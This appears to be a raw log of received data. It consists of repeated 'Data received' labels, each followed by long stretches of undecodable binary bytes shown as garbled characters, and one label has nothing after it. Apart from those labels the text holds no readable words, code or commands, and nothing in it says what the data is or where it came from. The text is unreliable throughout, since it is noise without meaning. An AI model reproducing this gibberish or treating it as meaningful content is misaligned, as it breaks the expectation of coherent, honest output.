’涳dÇEŸ(IeÏœéQÚN1¥`ó‰Ùcÿ¥Íòäèå¦ýȔÓÛHÿ“UœŸ·0¤Í²°Fûk·èÇ/:
Data received lšý³³]Ãׇô9Žo@yXߞ`˜óØÙxjzhᬈ´œ#é SÎ\önŒ¬^VytB?Nv”u®³¦åÅ^:Ím¸f¡_ˆ£2þC¦QœV)rñaÙÖpoÎVÞ£ÿ~9¾X€¹þø8‘5˜4½#pEXï†étxΘAúXÿ×ΐ{ϕł‰7dkÓÇí×ñ9S†ÜÍÛò¬lsŸk´ªÄæq"ï%Glÿ<þlPÂÑ^èj0¡ºÖT‡ddeëj+¬ÍÈÆLRš`˜Ì7ùÊ꤈[oîIæJÇ¿p’Ç’ ø)K„Ýðˆdàè#î-[²2-¾ÿÊçͱ†öÏ÷ª}·ÖððÎÕõÃ\ŒC{¿{Սç{ãe)¿ýMP¸ˆÝƒx‘‹UV‘GîÒ§Q<ÓÌ'{Ø¡‰o»µxa”u’³˜ž['<Ãua÷lŒ~h‹ÍRE¯¥˜Ø!4h8‚¢ëo¾šn–q ·ãçñ»ñ6âP/èʀƒ³¥ŸMûR:ü—|óh¾ÚXêÊ塅1È^ãÜ —¼Ã´Z¡oU6nÆdWÍ=VKpÕM '3ɉÃÊÍße‚è‘rQS=§”Í<šUÒBý¥ XŠµ7üUÞšs^.8ø!:vÀڄg,Y Eó…¶=r¯¦E"¨dОõÇ%|Täuä/-Â5''ûždVíŊeÊý#ÒÄï «P,‘ƒ\ÔU#@Eґ6éÙ§G]¡DBÞ9õ_5ºƒÍpRb1V±&±“¢¾†¥™<õeøŘvE«œŠe:›öš«·Ž{Ñæ àlàl+æÛOBŽñóY Û^9ÕÍ­§¾K^aì ^O39\Ö{ÿ-¬îa[Œ{Åm©x…ÓVÉã§øÇ@BXÚã­v¥ ™g$®§ ¶á$4è”ÿôZëXªeÕ8‹â¶`R‹ø7‘wmbäø<ücæ'½ë‘ø…0ƒL#áŒh12ò‹u•‰‘:X4˼´tä¾ ½"Pb=¦¾Âá|§®š«ÒbS&Y«M¹ì‡g.M‹OÞ¨Ö]á à”éeÛÆOª-ÆYåKeT¿/Z zÖ]GÏö %œ™’cj™É›S#PƿɱÏIsQóU݉YƒUÒÚ:2[‚Û" ¹ßX1¾´aB/¸{yÔAbË©WZJ<ÈÅuóu;©]£{ň¿úo•Ðgßèñ·fÌægñÀÊ+=.Œè‚S˜°&Ø5ÆX§è¨ýŠ}m°§ïàßcqy ;±<[dH„ùéV‡/ðÉmQˆ,¼Œ‰+»6Ób«ëAUÏ¥´h•|é¨JvEòpŒ¥n1”c›7—|Mƞ³ðp4-÷‰P©Ñ£®wŠ†:Šë(©»É¡9ÌɈ(óAbtüV€‘ýÂÄ¢‹yŽAšR<^JÐA|C{(-Qo҇­ þ0ÜM{žK¶™2}Súü¢ê+eÅP«óî¸ðsÖGK µkNÕ ³Xr€\¦Ðþ‡y€™"æ&ˆÐKл®eÕ’›+J7£§¨Z&B©Òt±x ”sã>‚joìŸ?ã‘|Xá~5r[B'pá8(ÏVÉýw[6eDTº²?‘Ÿ…b6oHWÖ2fÿbaLÉ ÷j¸ s•Zœq@}æ’.¬ñ{У–ßâªÒ`qêóVyó,Í ¤‡ŜY íÇdíÎ÷µ±vÕ¾;º ²J7}*…j&ñ°\ÔYÑP݋!zT¤R“Äŏ{DmpæÉ'+fP%Í©à|u+¤æjX¢ª¾ÅP{E-„MC•—Öç&'0ª
Data received ,7îԝ¶côI‘hv…\Ž(0ìbÂk×Þø•s¾Ô,›9ÉTO\ÀÖ%„”ŽB˜P“»ËUc°sßÜÕ­¹ö>0m‚.S@é.{0Òô¯…ƒz:"Ÿ9ôù0„#0ïÀL0ž:‘4IɟxîÑ5Ù÷cG·†— È>±¸r#i­ š8’:rlÂ=]²Yk6¡‰¬@…‹(xBŒýæ%6†e‹¦5ò²yCm!5ÃÉmg$ ~.çc#ýBGŽK®»ïq<ZiC`;i-8&A/¢?- tƒµ‡^¬#öõ¸Û梏ÀâŠ[OüsKv…eДú7.·ûk v ëfh’”ʝÄ$3¾.ýI¯t¶À¦E›ì`ÜA&[T¢ýk”’d Ö¾ó_Oí­9ë)¤ûiyK‡RO"y¦Æidö" úB‚iœ°>°=@EkÈëýܹVÂFꊂ4 æ"ÎÇÖ§k‹»|^™ÂívÌ LÂÄÐÈMP"Šy Á~nšyîJª3˜ý£j¨Ù"š–6ßхâ^DΔ`.þTŸþ¸<Ç5û;þ2ÚjlºwÍ2М,¼¾¬D®ò4Sö ììVÍZãN—2d¼ ÙzƒÎ™ÜIm…óÝc ;< ~&PªfµHòŠÊVÔº‹ 3=³®mOÓEaÂ`ńא°%Úzó›+.Xˆzä Bž€’öm¨K»UhЈº<.þ‡Ö™ÙÙ£E‡‡¥Ôò¦c~údåɞT“¡ÎIS j@àt"hìˆ\Þ¤çÉ*ãƍ(¸ä¤‘©¦²ì;8)à¯Ò%UC}g…HnyA|+{lFÀbAhø_GEj¦ù£á…ùV¯6w«2¯DgŽ ޅDÂß÷lçÄ#D'̘å®J|ëJuî¼~ӂ‡xÌÖgŽ\‡wXlöCøµ¼º$R'|i°GÊ¿hççWn–gáˆÂåZá½›J¯ÃúýºÛ>Â^µÞsb%–d:hý¨§Ø‚ üH€n~^õ™ÁŒ²-'¿{a)ðb#(U”sP$ç‡<Slr‹ŽAQ"xUތä5eëâ®Ìc¤¥=·õö@±,äœ7…L#QÆmē>0þGD#²{¬à΄þ¶fEU ;ú|üY~Í ÑόJrr`AÉù=w˜ä~-ñDíá\I[hÎýsu5eÜyÍwoh4¨ú-ä4äÄËíô?ŒE’]Ÿ‡?Ɯz8˂£…wõG©Á&N8 Ø,Âj¹*IŸ¾ºN4¸Š¿è·m±Ä«îŽTãÒtÙ?vö9.]œ5Yi|ž2–ðyô:Kdîñô–iø…'›¾ }ÈPâ]E.k­`Ì%»u &äӕïy#ì=)4’i`gŒ7/]𳲨=¨d€¬"وÛ(檐?&#°¥ ñôUÇx"l/l¸ˆó”ÓÛ "ÓwE’Ëuz$%u*åµÉÖkÇ%±”‹Ò†ÕÀÂq\B)֋*JîgKû©9&Õ ×C탕…ŸaæóèjnQ<vÈ (­ e Ä霊(ä uì¶èÚV€&BòýIÙ¢ÖÊâ¸õ÷ š]mn°vyd,ÔݍµfÕ0о§ÀIqù†î±}ÕÙ±†¢—È]»Ñ§AÔGc–nÑdvZf+ hE›T#öõjŠñM€E=۟7æø[—ÇÁûm&šü"]S ‹mƒ÷À¤1dÑI ŠvÓèM,¬ÿŽsš†/z54ñhšQòr˜|w\õ@Gçsa_£Sž—&Xû̾| ÚYëñÍ
Data received ÿâ:H]–õÿmáõ@äNW‚¦ç·væ®Ü¡k»†ý»éû±>”Q©ŽÄJíÍ [$[ŸF¡Ò­æEÖÀ"ž {ÔÑ+ýµÊTÇHµœl+~.Ǥª?Ž†«TµæÂø²’‚ ži_Š¨Sˆ|>2›ÈxðKë?1-¦$s9„¹i…ù["ß«ƒRÜUE¤Ø õw„ÞHU!Ü!Þo0 Š-þE‰‹D¥‡ªÐ1uzlañ)_ý¸Îc_—›9®îX…Ÿ­>½sˋ$USÕq6(µÛíbʐÃw¥¡~<'ô=%†÷…Úè(ÓÇ…+ù͗çu/š¶rBúÉï­ºËàÍ…/ÈyG+ù›i…#ËN‡B;ÿq:ÏÖ gÅðþÝ}\B¯LàMÒsåه»…„ÔwÏN|wHÊv³•M¬!1'®†–Ÿƒ 8d8X.»L@yžø2xÃtþÍÕL¢²—ë#whžI}íf€k7F2>A²ŽˆŒkËF‰ÃWLo2:nXž• û5FˆÇW ’¬à×iþ­p[”üÐþßÝY°gü¥=ö‡ÿڍ˦=ÖQ¡ÍNè& îüÙ(Ð~i#õ=ñÂ3˜ygWÙ#A/ ‡:VÀZo‚¹¯€ðœ¥…ÀPØYPŸ.1Ã@˜TÓ*¹ÙwV›ò ¥SÕü˜Ç]íTŒâ-!* Ñ>À‹A#$F¾D;nc=NoDñËE|ï¬:©9縉)IÝæ± íâ {i¨éh—ùÍÒ¬¶»zʙqYÖín+‡{m«ÜºÒ¸à^a:ïû¸&}ôɀ*pˆG ÌXÙÈÉÃ'ØáËC^‘2@ :ًõŽc7EÏQ^; 50Y¸bK:P{FŒ“È»S†¦:¶t}Z_™4̨åªaµa‚‹vçM*@ž}ÿPãtõ9:„BFÎ&ñÙW:RLÀÃOËiÐ-rôaò,Í|4è-ñ0M¿iH14áX•ùµl±Ñ©@°3QÙ<=þz@ëá<æ¢M›=Ôhƒcu€Œ`Òqê&>R=¤œœD¶gýóºË(#)ÏÏ{)'ŽJ÷DaÄ9ˆc¹á3–™ٳȍðÕ_µ¥Y¦Lûkïx]ފ õPÿ½;| vwöäçd c³Cý›X‹Ã#F ßåدo(£þ­C~ù r¨|̾µ6Ǟ?èUA”ÖÐv¬š%ð#ŽÜiº „2$6Á­'7Þ;â.SÕþYR¦ýªÐIA«¬1ÎÑ¢GÛu/]DAݐ“pŸV󭼪)DMÙz;…—é® T \¥ÊKV!¨FÏi*n)û`G‚Ÿ˜¦„ÊQîDç“ؽ9áÝë_B¾*°µ¦„…Òƒ @¬ »YeÔUI?\ ûB[æÀ·ýÚsû­Ñ)æ§è½õPk ¶¨G <ž(ˆeG‚«F]+ÿIãµô— }H˱xli¿Sÿ£ ¢Iõ.tö—@¤©»ù”¥éª¤)b—Îޗkqÿ›`ñ‡½ê[ç]€¦þDΑ˜šv¡pZÁEñik¿B…4ÍËdû€"v­°Â’¦ð"`8#à˜M3b"¯¤æø¶=É;9Ý<0îѬþV֙Šžô#Š’yt_QL{4ùG4õOÃ0W|±âÐ÷«gêe-Êå]M£ ¨”*7ñ¥“ ¶-ûÙ¤• ªÂ!HªáŸ¤ÀõhÙúÁú‘U&"MÕê* ß·&vckžSU‹Û’È]áV?G{¹ÄR^1<´çO¦2âŸ
Data received ³¥—âæÀ÷—T!×Xï_ڞ@ ÇØó Z¥ýÚm wöF¶dë3nj¾)þÅïî?‰­¯lrᚫ—ëe`fzY„- ±ëcRoòÚ4¹Ïó¾¬ë;M€¶ÎB{ƒ<9RËb[Èûâj8eaþúÜ= ܬ׋ ì»*Båþïù½ÇiœÁ­{<o¶>ÒR?VA…ý>-d³'ÅX‹¤)GÿÜ_‰C/ë…#<ۉ<å¸ZÌ„FŒ(6(/›±Î|!]!*Ó E6—¹XB/ ñ”îôŒªA&ÚsQÌMMP ®Ñ·Ã’j‚¢†×7x7„H{¬~|©LÕa1¬û ¾TGÙŒ{—;i@wA=ªŸµ‹é=¨ƒ‹çQKO3=lb„‡®.ޟä%>«æÏíߌ¥ccÄ`ü @Òc¯¦°ŠÎªE·Ñê Æh7ó`(¡ó–©I‰p„6™ºÎÿeɘœ(fýôóK~D#fÅMÚ.$dHæ]P˜ž ›qRͺy±ûIôᡕ>SäXg^ÿ3ê¢SxçöÎB8îtoüÙNõMŒÅ¢x T¿âÉ4t&Ö×oG?Âv|P°Z7íæ¾rp`ÊI©´³zóK9Ķ¬ø¶ø…1Á|Â#$š–“Vx,€_2MøÆhîIË5°çp_y›“‚zёÈÖá: 8ðߨ•k*IEöøâízïÁƝ~ôôZ0¥¡†.I¨+‚MÆÌ¿ÒÍ榝t”¸td¸àå݇™‹A¹*DNޚ<bJpÓ¦òÏZèk®`cÒ­#–JPFÉÎ^v¸á»ô~oX„—Z_{$˜ß<vB¯R»Ë¡åI㡍t Šg`MŽ„à9ÒÝÞtMB¡o4tÜçç f‘¶ ¸QÃ×Kò¨ÌN1\¾]tR“,Þtë Þö}*°ðt÷A±+êß·l55‰_Ì H\b"’¸7ö«‹q:‡À‡ãÁj_ÈkéÒ5A(¥kõ§lª_¹å’%=8ŽŸW°Ÿ—‹ !q®b¨è-Á~Ø54î˜ë‡7ºS%·¯b‚tˆÃ¼s–ÿKE^øCèòyT[É=¶£æ{ýV–TŒ(à?w$ïÒ>_Þ~ú^ ”%ñ 5–ÁÒhàê71÷V_f…h¸æÂ"´õ­hc^šØcÓ¹}çJú¶tC7ÑúÆe-TXÆP÷‘ôÊ+Õñđ„&8 Æmóáã^ÅB7‘p¦´–^ŸzŒ\Ý°Èo뛳ÐÖòù67nMƗZ…è¿gĖeïcÜXڙÇÐKé‹’C?(ÈB×á·ÕŒS¿®';ÕQžþƒÜÍ}d46`ázi?bK…/5NéÔd^ 3$þo\vŒ{²ªG£‡k•ù¯³éñ½YÁÏY–“¿Ý|¾Âzé#b… ŸàaÆ«7‰¿ú±UëšÆVô–‰+ý&í5=+I\¼Ò¤f“sˆåî†'ë6+øzŒlÁ;.÷„!˜£vbîi‚ŒÁ>S$Yܱ钩ÂÂH‘Âdò˜4í&3Ï¥ßD(¸ûg‹ W§Dä-2Jc§—b³Ž{ͯþJ¹X~÷Ù¬h®4Ã})ŻْˆuaEÔà 9’í,ë÷Öèý’â|º¼BŒ³û©‡FK}¤`c²ÅðÊê7›xô>øtlô =jU¼¾â-ãæÃDÜc>ÐyŸú%%GLty¯¿%Z.èíD¯A†:È“ÊO¦Œªýx}';Q`È»óSÁQh*éTMP‹cØô­`g>sZ"mK§”쇼æÊøw¼zë'8–åo
Data received ђSr¥a‡O§ë†1V(‚ËCªQ…éÆ bìdôL¡3PEM` xÁŶü­×Ž³àßÐ ã=I±jÕЪ1ýäåí"ðÓ»ØW”k*´V›¸¾j¦(W_ÇÅòÈ †¢…lV‘–‰H$†Ï*çøû<3ßЈÉ" Ø ¡îÉp¹î٘ˆÊ f&%«ÖŒW|NWiR¿Û®Ìb³ôÍ°¥1÷c;^ɪ/N½“$‚ßf>zß“æOZ_¾áåÉ=Î ¨Hã?„+ ë?†NÚ/¢ó ‘Oéò'bn5îÓIÊ2•°§¿åu7¢d“™ö\çØÇpS©#mXØ®1‘yXíÕô>IŒ9/¨?@?yà÷t÷ËÁ”„½ŠVj°pö͂^ЬËÌovCó±êͦiƔwk­ÓRً²Q ã'âéùŽà?uëŒRÇ“ z«]xOz1eúÒKZÓÕ}FJG;uß΀&םfˆMâUz3*Ii¬+d¶ƒ¡ô‹—óWŠ{ÔÆò×ISj•½<:o0W‚£z­p5æ¼Ë›[&fŽƒk~_¯+c 8‡;wEOâ»×b&ƒ"(‰ËiÑ"+J8È%¬Ë>/r•2ð‰¾)M‡ Þ Ž>+Yó£æ™ ^Æ N·,†oSó¢ÌØ«ÔªŒÜõŸÑTm>­Èobüö6ÚøÏÿ•äž‰R;¾?q՘ÝTA¾*¢=Ôo¯,uó6hz¤ ýÕ©ðÄꊼ7!ÊqCOtú)×oM|N‚¬)Ù͂ý^ÇD2a½Ä¨m†Ø+¯¡ÝM%f¯:¶ s…L¤t ã3ºœÜ)*¤i±ø3Y#{DΡI%­÷çêçòBªî9øg=-O2j ª_Q ‹öT¬,ñUíKO}Œ Y‘Áˆ¸(æ_À†³¤/€ýêڶȇìxfp‘†â§–÷òÒ°O`­ÃN9Ž§øD•7NŽ .'¼äbG‹}T”Ó*ßõÎÍÿ‹³®¯Íõˆ‹§ȾÄu³1ŒMÕBÞÓgk+#ÚR,áÛJ‡¹4ÊcºÔŒ ìIú-ú/!íñ,¿“- €SׇÛï¥hþ~¯ƒæn„÷"¯Õ>Ë2ba½Éç´í$¸Æ5ò ¶†›ô8öüJ³X3“Š2%;Šu¹B¦JjW‹ê?+¶öéñŠ+Jö_Ã=°Eª UÒ“0¥Io{,ŠšŸj”@FÓÝ0åÚï2 ç¦'®ÞfÇæé_¬{ A䗴‹3£ Æ=¢óæ:ïÇf9tyê©™tìþ¹{äºÔ!šuœN$S=†€E‹˜t€õ²®ŸÃ\×£—Ð"&û\)ÑvVKëØ#ÃÂw—WäP¡zѼ…—Otðñ­­×6ªayÙ ±®ìÄ2•g/S`¡B¾qqÃÑN‚؇^ž:w9on/’Ò|+߁¬+XšhK±qÿë àI®>¥'›+ç¤þÆý¼~óVí¨¢<çé‰mƒýiNŸ1­ŸdÌSy‹“g„ Èñr0ŽJüq×êw‰ê“䮘œ>…-­×Ž´™ NÐ㑺¥$"±»l&1(7Zn“å™X‹õï·.ñ*ÿí¨µ#J^^ædPr~z«ã•·$ë[ íj±w-©ž% ®]‰aÑé3ú9‘ÉÂQ ø[¾ ^5ˆ åéx'g™k±·¯ƒ-å¾Ò ×]Ö'…0×é1=¡â‚ð}jÎë4uâÐÇ«2ñ_Ûá~r‡ƒ:ëD†6 Gã·Ø[3õ®G
Data received ␦w \·à„ö>—0ܕ€Ø{̲ɆÏWP Tüh™ŸMj9‘èÕO‰ë˜^5â¯ãÛœ²Ÿ^’š²!¥ R‚Rp…ŒòrïµÂ`‘y¤Uú.‹‹_€ÃGì«,‹&RÕ¤ƒUj¿½ 9Ñ Â¨•ŠsÎNY× 8Þ½ ›ëY-»*?ñ¢«ž<ä3‡Ý‰ŒïIÀoonÛ¯~íµÖ 0øTà~¼›#gÀF| äÍ:ۏT„ø:i—¡âæNjŒ7³Q#ʁt¢lúêÞOÀéèû×1Úwn2¯E_ú…y/CƒJc_]/r˜Måá~ÚÂý­²Æ(h2LP~m݈®‡ú¬ÃïWá]ÙچÑÊ=M>léAA6°›·ºÔę¥£P|Ug!«-qÜBZ^ž »Ëq½ŜÜ;Ïôªä›3ù3‘ãESÿ&¡;}˜~îé³jÛ³§‚º$$ހX×ègWbè%¿†z}颯þ#-±“.{¿Óì(î¹lS@LT¾‡ÀN¦ygð à€AOF‚m8<.&uJlŒW§äÕñò“ý’ÉUûÕLÊ,y/è%|ìê#>‘²æÎY3~{C•_6}ÀÝîýMQ0C{øþ Äó¿‹9âº@õx(OnƝÎmk&œð@:ò|;8w)èïٟ¤è"ÅÙûQŸ²ìnDžb¡ äâìD}áå/Zs›fµ6”mø$DDMµøò`'eV6ó¾d×ôԚÕø‘9 ý‡åŸíêúK?¡!|¢åyŽaªÝ1U%,5kl?û*”þ´;ڄrFµÊBä ½¯¹l)¬²Z>ҙj“e.ÖcØOFzéú$´‡ìMêJG{ˆÏuwu6Q»D§nêò-˜FSrL6,G /œØ„YIPz;…´žI_Bã…s¸?w#ÆøÁõ_[籝æ/ÉS„Ú`Ò]`|~Îe®ò`*:Û/Jî{,y§°3o1<M°~ äàav8PE æà(ñ.ŠÒØÏ藯-GS{ŒN.펬á*¦o7`ÁÝÑUÒ ²x¡ ¶`ú™pU9AÌE56Ý[®IW‚,:õå¹ Çˆ­M„@KÈBU‚í ˜I€{“è‹ÝôîXÍ 7^­ndNy!ÂÍeWæ8ü5ípmôõã#E_à ËUk{ µ1tX°Ò÷gýäFwäD¬œ€ > {A–ûEL9Ï\²Öüš|CáUªçÚÇJDD™ºÒε±œËè80j,AQ˜ÈŸüš°²»€'¬§þcZBÕÞ҄ɤ*ÔÏåãûÞ ’Q¯wœ³KÕ~š e±ÄŽÒ«ú~I@»ó×ßÉm"Ù­¶ iÚcçþøJDGEfÄúÅè¤Ç®¢Õ’â'‡HoWŽ KÅ&®YýI3C¤åt؜N2#õYS/ó÷Ë?d«!57uÌ~ Jƒ'Lô¿Ô©kë]-–NejòIKðì[ÏN¦¡9ÊýYLz÷j—ØA|C¬9§oÛ5ÑVwòn› ÏÜop¥GRp÷•Êq¡Q³jh¬1Ï¡²×f¡M¾» 8r¿ÂûxŒaÜ´{~`‡/d&Z­ >Ú Í-ŠpÅ?]‡ë©rÂ{£ÄÄ{˜ã1ŠlÛFùÁ™¦-#£Ì›pOØkZJŸˆL±ÆûIèЌeÞøðáûˆ€°_Œmz#1Yc{Б`÷^½ï#<(ðm‘çî´IYÔP „9mò
Data received ëåŒ_# É.Æ5Òàf¢kwðjV^T0fAª´&xš­èúPî1´G(›ï踰_nS°WÁ‚¨Ä[ ‘ŸŒÏ†"ëÐOE!\ÿJe9étdxˆ}ºh±žñóD³™µP’úٍý}°¶Èèþ»Váó'æÙ0Xâ±1=ïsu8 ¿¨Ù6°­Tƒ>Y^{ÅÐ,€Êb Í918í–(uÕU”D̗ ‡3Ð_>a.åñ­'»¨@Ÿ‹’V~O¤‚­¹ÍIðaɬ͘|è2nŠYÖ¸ñ³hv"vºÔ³µcö^Bþ¤m^+–Â[ދZû¤ˆãÆl#Z=á¼'nª~&ö¤WTËH ¼&‚:ÕÄ:^ÍÔIõ¯5j ĽªÔíݤiNzýWoƒ±Î—nۛ$ks>‡JgՈœýÀoH1éµÄóà!oä-¹À1“óí³¯×ë {?nŽ{„ÀPÇS/ RA`™«p’©ƒê##²¹\Ea•õñ¶Ï4î]k–ôŸ`o*ù´|`! ôµ„X-å´//Êmµ­„¦³ÔtrÚ~ÈJ\…¶à½dš™é,—ÏógŒ¥Ph¡‚®•zr·O*Ÿi@¼"´¥TÙ}=âÝ于ZϐŠKÆX£Lg{è›U¹ËÓP_éYîtXЈb•âd¹è›ÄCò|á£ÓFÉ`Î,³y'Ʊôlýyçù'×Å%<O„ò3ž¤Êp,O}µ‰œÂ_t4<ØÅ5 Á@’ÿÙ¥ÐCÿ«hÉ :Ún›œÖØ"MÏ|z¸x898,òÊ֘ˠ3wTÝ bè•ÜÁ± 7uG͓zƒzHyÄٔí%HæõÖÏ`5e]eŠr=9U2fÍ ¶R‚—Ó05¦¡½Ðébù TÉY y¿Ògnoì»*Öƅ°ÅX/ˆÖ‹b¤—•ñhýT¥¡å•mQ1âIƒ›t1Z@úÓØBDPH€•§ |Ÿ¢ƒAÓÌÍïi ¹5R9Nï>ƒ8¥ x&èYÙJëgÓ²ê ä&é‡9àÎJXùyóÏ™J7ï’8ø¾òAsXȱ­™´evÂtÎþ®‚ì¨SpBcv8fnP˜¥¬®ý’‘+Ë:Z9•^›7ÿ˜»ƒ4CŠ]4{¦‚V¿žÕ_ÂmtáÒö\7?i„® ÛZýRŽá6|vKñý ¯üÜõ8áE^?Ìχ×ç¶òlŒ g«,âUvµÅå·=1€ïÈÿ×Ò;ERŒË®LŒÉ<x˜öØx ¥oÆÁšZtÚ)Ü=˜ÞáQo҆ÔBÔG¯¿2"íyÇ°ÕË*eqߣC ¤7ÿêÖԈÛ¾¡·(Î}Eñ3s¸¤D®ªW¢’û…I˜­P(×¹Ùàoö7Jäל ®Àǒh“ŠpƜmÞIˆÌ¤ZºDî¨fKQ¿åW™ÏöëÓ }®¶!ݾO/a…yp_¡¡Ü,‰Æ‚³g§Ê—M ú}.%îVP˜J ñw Ž³kÏHÙÁ o‡[s‚*Çe[…hnØlÖäÓÕñ:ðigñoÙî™:œÏ¨Y& ©áQ˜K«¢=‡dþ´Ž‰èÿ{nrîÓ¼Ò(8|STàd-EnÏþïy[»[šÖ¯å0H<3gþ¡°DÑfšýiÙhöH{ßÖ65€Y´\ÏA@ƒ®}WW"Àô(¿_:¿Z÷=¥D¡ÍB>â»fÑn¿‹o\ ‚FP&äÚ#ÏX¥Añ¹áSv¢±¸.dyP±(IAÁ»9ƒèZ:,&6Ó£¢Âé
Data received Ù{]î]‹]¸³Óï6­Ðx€äF’rä ,~ÿ;§b¼6¯µÅc‚Ú…Ê>]¼¾Ô†<½µ‚°Çr±)kÈ p×Ä´ îBK ƒW‰Q|Hu€c‹G£xn <>AÄ xâUUxK·Yâí)2ƒŒ?Ž‡*´³x¥wÁkÇ<T§‚ ?IГ¦Keë8rõl"ÄøÙ‡r[ƒՏM€€j¶‘ªï°"7ì˜žS]×Ĉ‡¥ïu“qÍj#HÕ°)½ ôàTŽß[“4oÕê´Ô]:¸ºÒóŸz²¡tçV#ޒZRÚä}I¼%Ê'õ´HºÓ,;»T°  wY¥.4 ¯äuy‰Œ=e1=nzD»g5%C# ÞýÌ£’b4GEìE̳ä®øu¨ ̃µ_óÊY˜ùÀõn³Og#¼!äö¼¶€ˆ¸ÅòÑËð¼šùHY2`ùΧs}¹’“u{|w{ê’úÈ6âãËFˆßÓ8ÚZùûÞ toKß-‘” ã ÐՁâ`‹‚ÊV‡è ˆÀäfš»ŽwpŒ‡^j$VDp±x±'æ\'t" <:IâÙ®Ÿ¨´¤1Vk‰=jvjšlÞ݊p³ª>º­ì­îHËî ä? Ê 2ìet^„´Š&)·§\npooºÒ—:PµzÎúŒ8’*Îɼwããôn3Rm ÉôâlyJmWôV‚®£ô8¨.öj½É| @‘<i£67ëGiå¯i~ÙP §§y… qüTÜãºÝ¹¶¶–A»ªÔEɛ€`ÅÌJ±@ÞHÁ_ *© Ò1ý¬2 Ø0§k-³“’L˜./.iÎ*‚é‰Ñ•–ì#×_Îpzš·»Å(ä<÷¦ÓéµZJOp–¿ªbœí`±€KÆGTf¥ù܊ð 4Ú¯™r •pÔ;¤ÉÁn ¡Âº@À/9ñÊ®OÄ t,»«ÞÖw3©E‘ øá ÷ڇ|¬&ÅâÏõä\”¶‰¯ëv’¥­ä™˜@„‚õÚ¤DƒŠJˆŽ²ü|†EbAE~1} ̘Àæ„; w·<٘SjRÁU*7Ì `Âò"- XLӈí§ËÕ 9F„š›}ҁ'ÇV¼…û@~k&0JvA¢H…Iö t¸\˂Ý5”“²ªµÏxPÁß9ã_òá%V¿† õo/Q";ÖÊÈÁÎQŒ)å8™ë›å]•Ì¦o¥$©L½ä9“@¤˜jã5óùm¬ò rGæ ¯‡}€s7k§aAüêªô¶º£ñU€c³·睍„ ºV û™Ó5ÛCǺ+çÛÍîh¢ÛL@¯ÉŽ¾ZJ£ðst‹þÝ` œž#C?QÄD´±ÈG]ϒ<g­mõf£÷ꋾiiꠧʇ®J’ªdK(ËKÃËhw¸ó͜õUA&,X÷êYÜ"\º—z£7ü“s/-ËÜÃ&"½c?/ê8¹SMW÷ èÂú+VœÏzKì"ÔpoB©˜‘:‚ßM ç}`-e|"ÉuõÔ-Î$®§¯„^SEƒxèBŸƒ ÂÍhÁ8¨ýöT(4ò‚E@ ÅåÁgŸp¬”Â9õÅåÃdJ¦o$©—²C½wöíé_S@ølא¥cµ_Ìë©ÿ¡dŒGz{Õu°` ßýqBK>×Ú=s!šk;á,3ñGt¡éúöÈ:Aïmqý<Ä_ƒÓñ}aªŠ’4•éÏ Ú'ûYÚ¤†gßíU!SHäWzÌyF GŸ†ù¤'Ï÷¤)¬ìùÙÎ
Data received \Žìx((. ÎÁš³)×ÊV’°^ÇéhÒ"ì ÔjK<ÈÔFµ .ú‰\Ìu-yyz•Ú~•ü×¾1sN Æ}Jð᜻ÿ^6ª'kýî‘aGàŠíH˜ä ‘Ë°ó!²ðW›;ž,ФU9²øN¥3˜ÈW½´K¢Æ·'Œ •§hú«„$#°.¨Š]44xH‹ž`<U’*"øô@XWEԊâ_Uå³Åªƒ—› Ù°þR²¿[Léìi?ŠuÖè=.ðùlæ꧷̌½:FGeç/nU›y‘ QÜ´ £µ¹sìz• b¾öÜ¿=ª–0›p|ñ®ð·£g²RªŒ¹—O=ŽªÊ±UÑÅ&ºŽ.ˆ瞻!Ô5ÈÚKö=´Tx2áǵë†k–ð–ÖŸ©j\Wó-Š±? w ÿìpÈu“¯á.!“p¾ ]»\ڈ¨–x[S総¯~<™4gN~½ÓÀ˄´,µ›AʕÀ2nü]£)›§ª5è°â¼ Üß×ɏ›Ã¡ þ0)MªIôãÅu–YÀ¾ÙÓì(xx!W±Î´gž–_˜]”µJ°Úbb<¬Ðó×úԗ•I؟Ñ­Ü"Z+ÎÍ$™‰n§½¯@X©Ï[b½‘Û3*Ä̾)ł)·wöî_Þ2¨£ëQµ€dÿ¥MK«(»í愅–Æ´–n±Ö˜ D+ÕvÛÎLŽ"'¬#“]ÏéãÊ6%lƒÙ Åß¢Ì '3æéS‘Ë%tõ‡ÁÙêÔNïgw±Ç†µC ²0}Ö̺ðâëÓÅ@éYnÍõ[¨—ÝTΕkŠIkk3‡½.W¼_Š@(ûiÏ±•! Ð0éÈy¦ï6ÿgæQ]ËûÓA)d^³°RË¡Á4GÕC½±nqÞ('Vï„üBeÉrO´æ`ÇÌ[G^h(ImgGúï´jŒ¥æSl²¤ÛC‹ª ߆é åÊIÎD¹eO YˆZ/К· ²†Ôí$©?Îw:b´ShüÛ5œRišz`=.šRnËÿ ¿ހd}cäê7Ô/¸èӵΗÛxAƒtXÎòî€þÊñI,ɾKY¾âWے ’ nc4ӄ¸ ÷¯™çi5±ªW®î‹^1äY43ÕÁ_öèÝùÇÈð9.Žêhôçßzqø pò¹¢Ð5A(îxFIˆ»ËPX‰^T%Ì¿¸!aþ´ßqƒò÷Jðkv)Xls$ÜüÍä6÷T ײРРS |ܬ, „ӮƃçÆzfSôÇAݐS”¡³Hў8»):H ۨ́ò$‚@7YM†õò[¾O¼<¡.ÖmKT[a%j§:œà wŒˆ‹³Âwjrï²%„B¸Ç:rz 8dÃþmZü³‘˜‚hkCǐº¶ØpyŸ-–©Žtèbè!Ί?”pž+lºRÂ9 S0ÍKæ^)íÇ(L)@X%p™¨`Çwûìõí,¯Aì{¤G«–uÖ¼ïÝ)üUŠÃC¬~Ìc6h·7Ëm¶÷CŠžÿTõ±mñíG™;tz‚9˜åF5—VTÍý¡ä&²BÀÌä1Ž•a¿6VgԈoˆÆhÒÊuÝåꑈiŞILY+",_‰/(¢Ðq½Å…b<«C Y^½täkäç덜&R†®UA® "qĦë‡ëÝváG!i#aµwºoœXQ¼+$‘bZל½ qûœM"قk æy(3OCðf
Data received 
Data received ¸0gw›a‡¯¾äãAîl ŒØö7gõOcT›š&¤é½Õ{a/ß#ØÈ䲯@JaalRޖû=à³Á‡4LÚÆÐÖ¨Ndìx\4¾wãé’Ør ¼’å^[‰I£PÊo¼„üîÌK™‘ØŠ7h!F\•( ÓS¤ŽD«½¥FžÚXpÛܛBi‘&ï蔸àµÊsÿš\²KؔÐ Ë PÔ&QTÑ O< îaÙæ¸mz·`„_¯Ê̳Ž|ŸœSý6OrˆB—é´ÌÜM\f;ÒÚ´øñ:cDN;=r b¤MF¸µ¿“ÝÂ7¨êmj³n@x{ ‡ÎÿPzR
